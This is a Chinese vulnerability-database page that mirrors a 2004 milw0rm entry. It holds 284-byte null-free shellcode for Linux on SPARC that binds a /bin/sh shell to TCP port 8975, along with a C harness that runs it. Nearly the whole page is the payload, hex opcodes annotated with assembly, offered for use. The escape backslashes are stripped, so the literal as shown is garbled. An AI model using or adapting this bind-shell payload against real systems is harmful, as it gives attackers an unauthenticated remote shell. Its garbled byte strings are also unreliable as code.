Linux/SPARC – Bind (8975/TCP) Shell + Null-Free Shellcode (284 bytes)
漏洞ID | 1054613 | 漏洞类型 | |
发布时间 | 2004-09-12 | 更新时间 | 2004-09-12 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux_SPARC | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
* 0-day portbind shellcode for all those Sun machines running linux..
* Coded from scratch, so i take all the credits.
* It simply binds a pretty shell in port 8975/tcp enjoy.
* no nulls, no fork, no shit, couldn't be more optimized.
* enjoy!.
*
* Arch : Sparc
* OS : Linux
* Task : Portbind
* Length : 284 Bytes
*
* Copyright 2002 killah @ hack . gr
* All rights reserved.
*
*/
#define NAME "Sparc Linux Portbind"
char portbind[]=
"x9dxe3xbfx78" // save %sp, -136, %sp
"x90x10x20x02" // mov 2, %o0
"x92x10x20x01" // mov 1, %o1
"x94x22x80x0a" // sub %o2, %o2, %o2
"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]
"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]
"xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ]
"x90x10x20x01" // mov 1, %o0
"x92x03xa0x44" // add %sp, 0x44, %o1
"x82x10x20xce" // mov 0xce, %g1
"x91xd0x20x10" // ta 0x10
"xd0x27xbfxf4" // st %o0, [ %fp + -12 ]
"x90x10x20x02" // mov 2, %o0
"xd0x37xbfxd8" // sth %o0, [ %fp + -40 ]
"x13x08xc8xc8" // sethi %hi(0x23232000), %o1
"x90x12x63x0f" // or %o1, 0x30f, %o0
"xd0x37xbfxda" // sth %o0, [ %fp + -38 ]
"xc0x27xbfxdc" // clr [ %fp + -36 ]
"x92x07xbfxd8" // add %fp, -40, %o1
"xd0x07xbfxf4" // ld [ %fp + -12 ], %o0
"x94x10x20x10" // mov 0x10, %o2
"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]
"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]
"xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ]
"x90x10x20x02" // mov 2, %o0
"x92x03xa0x44" // add %sp, 0x44, %o1
"x82x10x20xce" // mov 0xce, %g1
"x91xd0x20x10" // ta 0x10
"xd0x07xbfxf4" // ld [ %fp + -12 ], %o0
"x92x10x20x05" // mov 5, %o1
"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]
"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]
"x90x10x20x04" // mov 4, %o0
"x92x03xa0x44" // add %sp, 0x44, %o1
"x82x10x20xce" // mov 0xce, %g1
"x91xd0x20x10" // ta 0x10
"x92x07xbfxd8" // add %fp, -40, %o1
"x94x07xbfxec" // add %fp, -20, %o2
"xd0x07xbfxf4" // ld [ %fp + -12 ], %o0
"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]
"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]
"xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ]
"x90x10x20x05" // mov 5, %o0
"x92x03xa0x44" // add %sp, 0x44, %o1
"x82x10x20xce" // mov 0xce, %g1
"x91xd0x20x10" // ta 0x10
"xd0x27xbfxf0" // st %o0, [ %fp + -16 ]
"xd0x07xbfxf0" // ld [ %fp + -16 ], %o0
"x92x22x40x09" // sub %o1, %o1, %o1
"x82x10x20x5a" // mov 0x5a, %g1
"x91xd0x20x10" // ta 0x10
"xd0x07xbfxf0" // ld [ %fp + -16 ], %o0
"x92x10x20x01" // mov 1, %o1
"x82x10x20x5a" // mov 0x5a, %g1
"x91xd0x20x10" // ta 0x10
"xd0x07xbfxf0" // ld [ %fp + -16 ], %o0
"x92x10x20x02" // mov 2, %o1
"x82x10x20x5a" // mov 0x5a, %g1
"x91xd0x20x10" // ta 0x10
"x2dx0bxd8x9a" // sethi %hi(0x2f626800), %l6
"xacx15xa1x6e" // or %l6, 0x16e, %l6
"x2fx0bxdcxda" // sethi %hi(0x2f736800), %l7
"x90x0bx80x0e" // and %sp, %sp, %o0
"x92x03xa0x08" // add %sp, 8, %o1
"x94x22x80x0a" // sub %o2, %o2, %o2
"x9cx03xa0x10" // add %sp, 0x10, %sp
"xecx3bxbfxf0" // std %l6, [ %sp + -16 ]
"xd0x23xbfxf8" // st %o0, [ %sp + -8 ]
"xc0x23xbfxfc" // clr [ %sp + -4 ]
"x82x10x20x3b" // mov 0x3b, %g1
"x91xd0x20x10"; // ta 0x10
int
main() // test that techno-devil!
{
int (*funct)();
funct = (int (*)()) portbind;
printf("%s shellcodentSize = %dn",NAME,strlen(portbind));
(int)(*funct)();
exit(0);
}
/* EOF */
// milw0rm.com [2004-09-12]
相关推荐: Oracle Database 9i SQL Command Buffer Overflow Vulnerability
Oracle Database 9i SQL Command Buffer Overflow Vulnerability 漏洞ID 1097973 漏洞类型 Boundary Condition Error 发布时间 2004-09-07 更新时间 2004-…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666